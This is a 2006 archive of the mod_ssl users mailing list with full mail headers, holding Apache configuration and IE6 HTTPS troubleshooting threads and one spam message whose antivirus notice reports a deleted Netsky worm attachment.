tIHjG8FDZ6cIyXvuJ4FS+gL+yXMs15q/+/yzBuKCCuGJ2NQ5vGmhksxLFPjuyol3CwldcOSPyJ4P
78wxgVewSbXtWEQfVrqXpWivi/YA3uGyWV0wp0KVTeAAAAAAAAA=

------=_NextPart_000_00F0_01C6DE6F.A3606EE0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  3 23:54:04 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ACD9214D878; Tue,  3 Oct 2006 23:54:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.neti.ee (out45.neti.ee [194.126.126.45])
	by master.modssl.org (Postfix) with ESMTP id 7279A14D82B
	for ; Tue,  3 Oct 2006 23:54:04 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by MXR-5.estpak.ee (Postfix) with ESMTP id 870F517C9C6
	for ; Wed,  4 Oct 2006 00:53:53 +0300 (EEST)
Received: from mail.neti.ee ([127.0.0.1])
 by localhost (Relay5 [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 00343-04 for ;
 Wed,  4 Oct 2006 00:53:53 +0300 (EEST)
Received: from Relayhost1.neti.ee (Relayhost1 [192.168.1.101])
	by MXR-5.estpak.ee (Postfix) with ESMTP id 6E35B17C211
	for ; Wed,  4 Oct 2006 00:53:53 +0300 (EEST)
Received: from [88.196.108.206] (88-196-108-206-dsl.trt.estpak.ee [88.196.108.206])
	by Relayhost1.neti.ee (Postfix) with ESMTP id 7C3481CD75
	for ; Wed,  4 Oct 2006 00:53:53 +0300 (EEST)
Message-ID: <4522DBF0.8070903@raad.tartu.ee>
Date: Wed, 04 Oct 2006 00:53:52 +0300
From: Toomas Aas 
User-Agent: Thunderbird 1.5.0.7 (X11/20060918)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Detecting if https is used from within a .conf file
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd-new-2.2.1 (20041222) (Debian) at neti.ee
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Toomas Aas 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello!

I set out to accomplish what I thought was a simple task 3 hours ago, 
but now I'm stumped. Is there a way to have a conditional block in 
httpd.conf which would achieve a simple thing like this:

if current connection is a https connection
	some directives
end

?

The obvious answer is, of course, put these directives in your ssl 
virtualhost, so let me explain further...

I have a site which is available both via http and https. There are two 
virtual hosts defined for this site, one with


And one with


Additionally, there are a number of name-based virtual host served on 
the same IPAddress on port 80.

The two aforementioned VirtualHost sections in my config file contain
a fair amount of Alias and Redirect directives which are almost, but not
entirely, identical. For example, there are several of Redirect 
directives that redirect to http://www.mysite.com/somewhere for the http 
vhost and to https://www.mysite.com/somewhere for the https vhost.

I was thinking of putting this large block of directives into separate 
file and Include it in both vhost sections, to tidy up my main config 
file. But in order to do that, I would need to define some logic in this 
file for those cases where http and https need to be handled separately. 
I was certain that such possibility exists, but I'm starting to have 
some doubts now. Any advice?

Using Apache 2.0.53.

--
Toomas Aas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  4 00:09:34 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D7BAC14D87F; Wed,  4 Oct 2006 00:09:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ukfsn.org (s2.ukfsn.org [217.158.120.143])
	by master.modssl.org (Postfix) with ESMTP id 7DC4714D82C
	for ; Wed,  4 Oct 2006 00:09:33 +0200 (CEST)
Received: from localhost.localdomain (84-45-209-227.no-dns-yet.enta.net [84.45.209.227])
	by mail.ukfsn.org (Postfix) with ESMTP id 017CCE7112
	for ; Tue,  3 Oct 2006 23:08:30 +0100 (BST)
Received: from [127.0.0.1] (helo=sydb.dyndns.org)
	by localhost.localdomain with esmtp (Exim 3.36 #1 (Debian))
	id 1GUsJU-0007Am-00
	for ; Tue, 03 Oct 2006 23:00:32 +0100
Received: from 127.0.0.1
        (SquirrelMail authenticated user mpacey)
        by sydb.dyndns.org with HTTP;
        Tue, 3 Oct 2006 23:00:32 +0100 (BST)
Message-ID: <33644.127.0.0.1.1159912832.squirrel@sydb.dyndns.org>
In-Reply-To: <4522DBF0.8070903@raad.tartu.ee>
References: <4522DBF0.8070903@raad.tartu.ee>
Date: Tue, 3 Oct 2006 23:00:32 +0100 (BST)
Subject: Re: Detecting if https is used from within a .conf file
From: "Michael Pacey" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.4
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Pacey" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Toomas Aas said:

> I was thinking of putting this large block of directives into separate
> file and Include it in both vhost sections, to tidy up my main config
> file. But in order to do that, I would need to define some logic in this
> file for those cases where http and https need to be handled separately.
> I was certain that such possibility exists, but I'm starting to have
> some doubts now. Any advice?
>
> Using Apache 2.0.53.


I don't think you can put runtime logic into the configuration but why not
just  put the common stuff in the included file and the protocol specific
stuff in the virtual host sections?

--
Michael Pacey

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  4 00:47:00 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A075A14D87F; Wed,  4 Oct 2006 00:47:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id C31A114D82C
	for ; Wed,  4 Oct 2006 00:46:56 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id k93MkjdJ005152
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Tue, 3 Oct 2006 15:46:45 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.6/8.13.4) with ESMTP id k93MkehY015003
	for ; Tue, 3 Oct 2006 15:46:40 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.6/8.13.4/Submit) id k93Mket1015002
	for modssl-users@modssl.org; Tue, 3 Oct 2006 15:46:40 -0700
Date: Tue, 3 Oct 2006 15:46:40 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: Detecting if https is used from within a .conf file
Message-ID: <20061003224639.GA12345@ligo.caltech.edu>
References: <4522DBF0.8070903@raad.tartu.ee>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <4522DBF0.8070903@raad.tartu.ee>
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.10i
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 4552190 - 1fcf5547c080
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Toomas Aas wrote:
> 
> I was thinking of putting this large block of directives into separate 
> file and Include it in both vhost sections, to tidy up my main config 
> file. But in order to do that, I would need to define some logic in this 
> file for those cases where http and https need to be handled separately. 
> I was certain that such possibility exists, but I'm starting to have 
> some doubts now. Any advice?

Very simple. Just add the logic to apachectl. It's a shell script.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  5 11:25:40 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CCA0F14D869; Thu,  5 Oct 2006 11:25:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from modssl.org (wcoe-98.r-195-35-225.essentkabel.com [195.35.225.98])
	by master.modssl.org (Postfix) with ESMTP id 1D11C14D866
	for ; Thu,  5 Oct 2006 11:25:40 +0200 (CEST)
From: rse@engelschall.com
To: modssl-users@modssl.org
Subject: =?utf-8?Q?[Spam]_-_?=Mail Delivery (failure modssl-users@modssl.org)
Date: Thu, 5 Oct 2006 11:37:29 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="a----=_NextPart_000_001B_01C0CA80.6B015D10"
X-Priority: 3
X-MSMail-Priority: Normal
X-GateDefender-Antispam: spam (score=96)
Message-Id: <20061005092540.1D11C14D866@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--a----=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: multipart/alternative; boundary=GDalert_boundary_809703

--GDalert_boundary_809703
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit

+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (FakefromWorm) in the following file: message.scr
W32/Netsky.P.worm

The file has been deleted to protect the network.
05/10/2006 11:25:12 [GMT+0200]

www.pandasoftware.com

+----------------------------------------------------+

--GDalert_boundary_809703
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable





+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (FakefromWorm) in the following file: message.scr
W32/Netsky.P.worm

The file has been deleted to protect the network.
05/10/2006 11:25:12 [GMT+0200]

www.pandasoftware.com

+----------------------------------------------------+





--GDalert_boundary_809703--


--a----=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: multipart/mixed;
	boundary="a----=_NextPart_000_001B_01C0CA80.6B015D10"

80.6B015D10
Content-Type: multipart/alternative; boundary=GDalert_boundary_809599

--GDalert_boundary_809599
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit

+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (HackTool) in the following file: message_attachment3
Exploit/iFrame

The file has been deleted to protect
--a----=_NextPart_000_001B_01C0CA80.6B015D10--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  6 16:54:01 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4C3E114D863; Fri,  6 Oct 2006 16:54:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tep.ro (tep.ro [193.226.82.1])
	by master.modssl.org (Postfix) with ESMTP id 01C6614D82C
	for ; Fri,  6 Oct 2006 16:54:00 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 29F3864193
	for ; Fri,  6 Oct 2006 17:51:06 +0300 (EEST)
X-Virus-Scanned: amavisd-new at tep.ro
Received: from mail.tep.ro ([127.0.0.1])
	by localhost (mail.tep.ro [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id cUq+iNVkc6aK for ;
	Fri,  6 Oct 2006 17:51:05 +0300 (EEST)
Received: from 193.226.82.7 (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 0DCDB64192
	for ; Fri,  6 Oct 2006 17:51:05 +0300 (EEST)
Received: from 82.76.22.104 (proxying for 10.84.99.92)
        (SquirrelMail authenticated user milie)
        by 193.226.82.7 with HTTP;
        Fri, 6 Oct 2006 17:51:05 +0300 (EEST)
Message-ID: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>
Date: Fri, 6 Oct 2006 17:51:05 +0300 (EEST)
Subject: Encripted page would not load into IE
From: "BB" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-2
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BB" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I am running Apache 1.3.37 and openssl 0.9.8b from Slackware-current
packages. I set up a https virtual host that listens on the default
address.

My problem is that the encrypted pages don't load in IE 6. They are
working just fine in Firefox.

There are no errors in the logs:
[06/Oct/2006 17:29:39 03090] [info]  Connection to child 1 established
(server xxxxxxxxxxxxxxxxx:443, client xxxxxxxxxxxxx)
[06/Oct/2006 17:29:39 03090] [info]  Seeding PRNG with 1160 bytes of entropy
[06/Oct/2006 17:29:39 03090] [info]  Connection: Client IP: xxxxxxxxxxx,
Protocol: SSLv3, Cipher: DHE-RSA-AES256-SHA (256/256 bits)
[06/Oct/2006 17:29:39 03090] [info]  Initial (No.1) HTTPS request received
for child 1 (server xxxxxxxxxxxxxxxxx:443)
[06/Oct/2006 17:29:56 03090] [info]  Connection to child 1 closed with
standard shutdown (server xxxxxxxxxxxx:443, client xxxxxxxxxxxxxxx)

I played around with the ciphers in mod_ssl.conf, allowing only 128 bits
ones (as IE is not 256 bits capable), but the result is the same.

I allowed all protocols, but no success.

Please tell me where shoud I look further?

Can this be a certificate problem? Should I re-generate the server's
certificates? If yes, with which parameters?

Thank you in advance,
BBR



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  6 17:00:56 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B511714D86C; Fri,  6 Oct 2006 17:00:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ukfsn.org (s2.ukfsn.org [217.158.120.143])
	by master.modssl.org (Postfix) with ESMTP id 7CDB614D85F
	for ; Fri,  6 Oct 2006 17:00:55 +0200 (CEST)
Received: from localhost.localdomain (84-45-209-227.no-dns-yet.enta.net [84.45.209.227])
	by mail.ukfsn.org (Postfix) with ESMTP id 8DCD4E7014
	for ; Fri,  6 Oct 2006 16:00:40 +0100 (BST)
Received: from [127.0.0.1] (helo=sydb.dyndns.org)
	by localhost.localdomain with esmtp (Exim 3.36 #1 (Debian))
	id 1GVr3F-0006Cq-00
	for ; Fri, 06 Oct 2006 15:51:49 +0100
Received: from 127.0.0.1
        (SquirrelMail authenticated user mpacey)
        by sydb.dyndns.org with HTTP;
        Fri, 6 Oct 2006 15:51:49 +0100 (BST)
Message-ID: <36581.127.0.0.1.1160146309.squirrel@sydb.dyndns.org>
In-Reply-To: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>
References: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>
Date: Fri, 6 Oct 2006 15:51:49 +0100 (BST)
Subject: Re: Encripted page would not load into IE
From: "Michael Pacey" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.4
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Pacey" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

BB said:
> Hello,
>
> I am running Apache 1.3.37 and openssl 0.9.8b from Slackware-current
> packages. I set up a https virtual host that listens on the default
> address.
>
> My problem is that the encrypted pages don't load in IE 6. They are
> working just fine in Firefox.


I've never seen anything like this. Apologies if I'm insulting your
intelligence but have you checked you don't have some strange proxy
settings in IE that could be causing this? Have you tried doing a netstat
on the server (or client) to prove that you are in fact making a TCP
connection? If you're not, it's not an Apache or mod_ssl issue.

-- 
Michael Pacey

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  6 17:20:58 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5302714D863; Fri,  6 Oct 2006 17:20:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tep.ro (tep.ro [193.226.82.1])
	by master.modssl.org (Postfix) with ESMTP id 1C88F14D82C
	for ; Fri,  6 Oct 2006 17:20:57 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 4B3AD64194
	for ; Fri,  6 Oct 2006 18:18:03 +0300 (EEST)
X-Virus-Scanned: amavisd-new at tep.ro
Received: from mail.tep.ro ([127.0.0.1])
	by localhost (mail.tep.ro [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id WMtM6zsjG4Rm for ;
	Fri,  6 Oct 2006 18:18:02 +0300 (EEST)
Received: from 193.226.82.7 (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 3115464192
	for ; Fri,  6 Oct 2006 18:18:02 +0300 (EEST)
Received: from 82.76.22.104 (proxying for 10.84.99.92)
        (SquirrelMail authenticated user milie)
        by 193.226.82.7 with HTTP;
        Fri, 6 Oct 2006 18:18:02 +0300 (EEST)
Message-ID: <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>
In-Reply-To: <36581.127.0.0.1.1160146309.squirrel@sydb.dyndns.org>
References: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>
    <36581.127.0.0.1.1160146309.squirrel@sydb.dyndns.org>
Date: Fri, 6 Oct 2006 18:18:02 +0300 (EEST)
Subject: Re: Encripted page would not load into IE
From: "BB" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-2
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BB" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I made the tests with IE from at least 4 different computers, located in
networks from 3 different ISP's.

Yes, the connection is done, because ith shows up instantly with
tail -f /var/log/apache/ssl_engine_log


>> I am running Apache 1.3.37 and openssl 0.9.8b from Slackware-current
>> packages. I set up a https virtual host that listens on the default
>> address.
>>
>> My problem is that the encrypted pages don't load in IE 6. They are
>> working just fine in Firefox.
> 
>
> I've never seen anything like this. Apologies if I'm insulting your
> intelligence but have you checked you don't have some strange proxy
> settings in IE that could be causing this? Have you tried doing a netstat
> on the server (or client) to prove that you are in fact making a TCP
> connection? If you're not, it's not an Apache or mod_ssl issue.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  6 18:12:10 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 657D414D863; Fri,  6 Oct 2006 18:12:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web53710.mail.yahoo.com (web53710.mail.yahoo.com [206.190.37.31])
	by master.modssl.org (Postfix) with SMTP id CBB4414D82C
	for ; Fri,  6 Oct 2006 18:12:07 +0200 (CEST)
Received: (qmail 26006 invoked by uid 60001); 6 Oct 2006 16:11:55 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=l6k7LpNfmeBtZ8Or2YJdS4i55B5tpxQf5AydxF1DzhV3e6XG5D8m86R+ohH5ngt6TYt+XEcM2P2MU1jSul3J2lNL8ip1u54mTSHoGw21uWtF9ImJduA/XgmCC9/amSsAY3E5pqowrYpTM3IcyVd5WRbg7ghOcpmealMGK7Jaerk=  ;
Message-ID: <20061006161155.26004.qmail@web53710.mail.yahoo.com>
Received: from [80.67.64.10] by web53710.mail.yahoo.com via HTTP; Fri, 06 Oct 2006 09:11:55 PDT
Date: Fri, 6 Oct 2006 09:11:55 -0700 (PDT)
From: a k 
Subject: Re: Encripted page would not load into IE
To: modssl-users@modssl.org
In-Reply-To: <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a k 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

If IE allows you might change the protocl or cipher
used (apache config also you to adjust order). Using
curl i noticed somethign funky (some of the times)
with  ssl2 that did not appear with ssl3 (curl at
least does not capture the full data). Not sure if
this was a problem with curl, openssl or apache.

(if you have curl - curl -2 https://url will use ssl2
and curl -3 ... will use ssl3

--- BB  wrote:

> I made the tests with IE from at least 4 different
> computers, located in
> networks from 3 different ISP's.
> 
> Yes, the connection is done, because ith shows up
> instantly with
> tail -f /var/log/apache/ssl_engine_log
> 
> 
> >> I am running Apache 1.3.37 and openssl 0.9.8b
> from Slackware-current
> >> packages. I set up a https virtual host that
> listens on the default
> >> address.
> >>
> >> My problem is that the encrypted pages don't load
> in IE 6. They are
> >> working just fine in Firefox.
> > 
> >
> > I've never seen anything like this. Apologies if
> I'm insulting your
> > intelligence but have you checked you don't have
> some strange proxy
> > settings in IE that could be causing this? Have
> you tried doing a netstat
> > on the server (or client) to prove that you are in
> fact making a TCP
> > connection? If you're not, it's not an Apache or
> mod_ssl issue.
> 
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  6 18:18:19 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E519E14D86C; Fri,  6 Oct 2006 18:18:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail15.ca.com (mail15.ca.com [208.232.182.54])
	by master.modssl.org (Postfix) with ESMTP id 6492C14D85F
	for ; Fri,  6 Oct 2006 18:18:18 +0200 (CEST)
Received: from USILMS12.ca.com ([141.202.201.12]) by mail15.ca.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Fri, 6 Oct 2006 12:18:07 -0400
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Encrypted page would not load into IE
Date: Fri, 6 Oct 2006 12:18:05 -0400
Message-ID: <2629CC4E1D22A64593B02C43E855530301480759@USILMS12.ca.com>
in-reply-to: <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Encrypted page would not load into IE
Thread-Index: AcbpWwOlibAl4eiiQMSPhxBVUJ6jPAAB1cCQ
From: "Richters, Eriks A" 
To: 
X-OriginalArrivalTime: 06 Oct 2006 16:18:07.0274 (UTC) FILETIME=[021718A0:01C6E963]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Richters, Eriks A" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Which OS have you tried?  Were they all XP?  Windows 2000? ME? 98? 95?
Is there any chance that the computers that you tried have a special
build or some software installed that might be causing a problem? I've
seen similar problems be caused by a particular company's standard
desktop build.=20
 =20

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of BB
Sent: Friday, October 06, 2006 11:18 AM
To: modssl-users@modssl.org
Subject: Re: Encripted page would not load into IE

I made the tests with IE from at least 4 different computers, located in
networks from 3 different ISP's.

Yes, the connection is done, because ith shows up instantly with
tail -f /var/log/apache/ssl_engine_log


>> I am running Apache 1.3.37 and openssl 0.9.8b from Slackware-current
>> packages. I set up a https virtual host that listens on the default
>> address.
>>
>> My problem is that the encrypted pages don't load in IE 6. They are
>> working just fine in Firefox.
> 
>
> I've never seen anything like this. Apologies if I'm insulting your
> intelligence but have you checked you don't have some strange proxy
> settings in IE that could be causing this? Have you tried doing a
netstat
> on the server (or client) to prove that you are in fact making a TCP
> connection? If you're not, it's not an Apache or mod_ssl issue.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  6 18:40:32 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 46A0814D863; Fri,  6 Oct 2006 18:40:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ukfsn.org (s2.ukfsn.org [217.158.120.143])
	by master.modssl.org (Postfix) with ESMTP id 1C35B14D82C
	for ; Fri,  6 Oct 2006 18:40:29 +0200 (CEST)
Received: from localhost.localdomain (84-45-209-227.no-dns-yet.enta.net [84.45.209.227])
	by mail.ukfsn.org (Postfix) with ESMTP id 220F1E7074
	for ; Fri,  6 Oct 2006 17:40:11 +0100 (BST)
Received: from [127.0.0.1] (helo=sydb.dyndns.org)
	by localhost.localdomain with esmtp (Exim 3.36 #1 (Debian))
	id 1GVsbY-0006On-00
	for ; Fri, 06 Oct 2006 17:31:20 +0100
Received: from 127.0.0.1
        (SquirrelMail authenticated user mpacey)
        by sydb.dyndns.org with HTTP;
        Fri, 6 Oct 2006 17:31:20 +0100 (BST)
Message-ID: <36686.127.0.0.1.1160152280.squirrel@sydb.dyndns.org>
In-Reply-To: <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>
References: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>   
    <36581.127.0.0.1.1160146309.squirrel@sydb.dyndns.org>
    <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>
Date: Fri, 6 Oct 2006 17:31:20 +0100 (BST)
Subject: Re: Encripted page would not load into IE
From: "Michael Pacey" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.4
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Pacey" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


BB said:
> I made the tests with IE from at least 4 different computers, located in
> networks from 3 different ISP's.
>
> Yes, the connection is done, because ith shows up instantly with
> tail -f /var/log/apache/ssl_engine_log
>
>

Sounds weird. You could try installing an HTTP capture tool like IE Watch
and seeing if that gives any useful info.

-- 
Michael Pacey

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct  7 07:08:54 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 29F4C14D86C; Sat,  7 Oct 2006 07:08:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tep.ro (tep.ro [193.226.82.1])
	by master.modssl.org (Postfix) with ESMTP id E730514D83A
	for ; Sat,  7 Oct 2006 07:08:53 +0200 (CEST)
